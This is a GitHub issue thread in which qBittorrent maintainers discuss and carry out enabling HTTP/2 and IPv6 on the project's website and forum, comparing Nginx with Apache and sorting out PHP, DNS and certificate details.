Suggestions for server

[Chocobo1]

Aside from a new homepage, would be nice to have:

• IPv6 connectivity
• HTTP/2

Also tagging @Balls0fSteel :)

[Balls0fSteel]

Yeah I checked HTTP/2 just recently, but the module was tagged experimental IIRC. Will look into it on the weekend again. (The stack runs on Apache but we can move to Nginx, there is nothing keeping us on Apache.)

IPv6 we have IPv6, but it's disabled in sysconf. :P Will re-enable it and look things up. Should work too.

Pls ping me in a few days (Tuesday?) If I don't do stuff. Is there a bot for Github that pings people if they ask for it?

[Chocobo1]

+1 for Nginx We can run it on another port to test it before dumping apache.

If I don't do stuff. Is there a bot for Github that pings people if they ask for it?

Not one I am aware of. But we're not in a hurry.

[Balls0fSteel]

Alright, I set up nginx + http/2 for it (yeah, read the manual and spent 5 minutes copy-pasting :D). It runs OK on an alternative port. Tomorrow I will set up the SSL part (well, that's like needed for http2), and we will see. If it serves things out alright, I will shut Apache and let Nginx run amok.

Fingers crossed. (Probably I will just set up blank page configs and let Certbot just make new certs. No one cares about certs anymore since Letsencrypt started anyway.)

Thanks for the suggestion btw, this really kicks our site up a notch (kinda pushes it to 2017-2018).

[Chocobo1]

Tomorrow I will set up the SSL part (well, that's like needed for http2), and we will see. If it serves things out alright, I will shut Apache and let Nginx run amok.

Cool! We currently sets a bunch of http headers in .htaccess and nginx seems to reject that user config idea: link. Well, I guess we can tune it later.

Thanks for the suggestion btw, this really kicks our site up a notch (kinda pushes it to 2017-2018).

You're welcome!

Just got into my mind, IPv6 would need sledgehammer999 to setup DNS AAAA records, we should ping him when ready.

[Balls0fSteel]

Ah, I can access the DNS settings for both sites, so it's okay for now. (I cannot really tell which has it better. Cloudflare has its hiccups and the other provider has its issues.)

I already made AAAA records for the forums + builds (the guinea pigs, lol). IPv6 is up and running (forgot to add), just I didn't want to mess around with it before Nginx is done because you know, you have to set it up in the HTTP server too. So if I spent the time to make it work in Apache, then I had to re-make it all over again for Nginx.

So I just kept it for Nginx. But we should see today in a few hours. (Also I gotta fetch myself some IPv6, or maybe I will just use some remote thingie to try IPv6. My country won't have IPv6 'til 2030 or something like that by this rate.)

[Balls0fSteel]

Ok, setting up NGINX for HTTPS (http/2) might be a hell of a task. https://bugs.launchpad.net/nginx/+bug/1403283 https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=773332 * https://gist.github.com/dkubb/7473330

So... I don't know. Basically, you get thrown down in Google Rankings / get punished, or you run your site insecure. Great choices for 2017, from an enterprise software (nginx) that can cost thousands of dollars if you want support for it. Terrific software, I must say.

Using Cloudflare for the main site could simply mitigate all risks while using lean configs, but it's out of the question sadly (does not support what we need). So... I don't know. Apache + https2 maybe? It cannot be that bad, can it?

(*) It's said to be fixed but all web results warn you that it is still active. I don't know. The version we have is straight from Nginx (deb repo).

[Chocobo1]

So... I don't know. Basically, you get thrown down in Google Rankings / get punished, or you run your site insecure.

For www.qbittorrent.org domain I think it's not that dangerous, as the site is only serving content. See: http://breachattack.com/ Am I affected?

As for the forum, well, better not take the risk.

Anyway, what is the version of nginx you're testing?

Apache + https2 maybe? It cannot be that bad, can it?

Problem is, apache newer release fixed some issues and ubuntu repo is too slow to catch up (one reason why I dumped debian/ubuntu). And they don't include http2 module by default (because it is experimental) even in their latest release 17.04. Unless there is a trustworthy repo to fetch with, or you want to build it manually for every release :P, I don't recommend it.

[Balls0fSteel]

Welp. Can't believe so much time passed and it's still just experimental in 17.04... crazy. PPA could work probably, I simply usually use dget and push it to a simple personal own repo (or just use pbuilder, meh).

NGINX version I used the deb repo they provide. So it should be the latest and greatest. Question is only that if it's already patched or not. The Debian page says it is, but online everyone is crying about it and recommends disabling GZIP altogether.

But yeah, if https2 is just broken in Apache, there will be no choice besides Nginx.

[Balls0fSteel]

Btw if being "experimental" or "broken" or "vulnerable" means they can access the data, we should not care like AT ALL. What could anyone ever stole? A forum login that could be hacked with some 0-day anyway? Use wireshark to capture our qBittorrent.org website?

Like, there is really zero security implications for us here... IMO.

[Chocobo1]

Like, there is really zero security implications for us here... IMO.

Even that so, it will make us look bad/incompetent, oh damn, the horror of security breach headline on the news site.

[Balls0fSteel]

Free publicity is always good, am I right? 👍 Just kidding. I will enable it and see how much these sites cry about our "safety".

[Balls0fSteel]

Spent the last few hours with Apache. Turns out we would have to upgrade the php package too. No biggie, right? Well, except it is. SMF is known to lag (very) behind and the latest version only added support to 7.0, but 7.1 refuses to work.

So now we have a way-up-to-date system that still won't load http/2 even though the module is enabled. So... Nginx, here we come!

[sledgehammer999]

I know how fun it is to play with new toys, but to remind you that the current site is very simple. So you don't have to jump through hoops to get http/2 working. PS: I am not blocking http/2 feature, I am just reminding you the simplicity.

[Balls0fSteel]

I know... The entire move would have been so simple, but SMF apparently only supports the old version and the 7.0 version. Changelog said php7 so I did not bother to set up an entire vm just to test this one thing out. So since the Apache PPA would have bumped up the entire thing to 7.1 (or 7.2) (if you want http/2 you have to add the Apache + PHP PPA from the same person). So either one thing works, or the other one.

Because the site is simple. But http/2 implementation in Apache is not. Funny enough it worked just fine until the very last version with the stock php. But of course, the new version does not work anymore. So you gotta bump the php as well. And ... you know the rest.

NGINX ... I have set it up on alternate ports once my Apache adventure was over and I cleaned up the mess. But there is no telling if it will work if I swap it. So I will wait until weekend or Thursday, then do a swap early morning / late night and hope for the best. It should work, but you know how it is.

[Balls0fSteel]

Did not have time to mess around but Apache received a patch from the repo and now the main site is HTTP/2 enabled (by Apache). Yay.

I will set up IPv6 tomorrow (just have to enable it in the Apache config, add the records and off we go.) Btw there is SPDY support too that we could add, but I could not find any solid info on this. Like the Google page says SPDY has been donated to Apache - so you should not use that one. If you try to look for it at Apache, there is nothing.

Yet, if you visit Google.com, and use "SPDY Indicator" in Chrome, it will show it's SPDY+HTTP/2 enabled. We will live without this one though, no worries.

[Balls0fSteel]

Okay so IPv6 is enabled, records are added.

So HTTP/2 and IPv6 is OK. But we are still not 100%.

"The authoritative DNS server is not accessible over IPv6. Caution! IPv6 only users will have problems to access your site." http://validador.ipv6.br/index.php?site=qbittorrent.org&lang=en

The entries we have at Cloudflare work like a charm. But Namecheap returns this error.

This page: https://www.namecheap.com/support/knowledgebase/article.aspx/768/10/how-do-i-register-personal-nameservers-for-my-domain says I have to contact support. But now we will have to run our DNS server as well? Wow.

Update: Some sites report it OK, some complain. Dunno. Cloudflare passes all tests, Namecheap fails a few.

[Chocobo1]

Great job!! I can verify AAAA records are indeed there & http/2 is working on qbittorrent.org & forum. 🥇

Btw there is SPDY support too that we could add, but I could not find any solid info on this

SPDY is the predecessor of HTTP/2 so just ignore it, IIRC it is going deprecated.

"The authoritative DNS server is not accessible over IPv6. Caution! IPv6 only users will have problems to access your site." But now we will have to run our DNS server as well? Wow.

No need, that's namecheap's problem, IMO, now is good enough. Any sane person won't go (and can't go anywhere) with IPv6 only.

[Balls0fSteel]

Thanks for checking and the original suggestion! Added http/2 for the rest of the bunch as well.

[Chocobo1]

Thanks to you too. I suppose this ticket can be closed.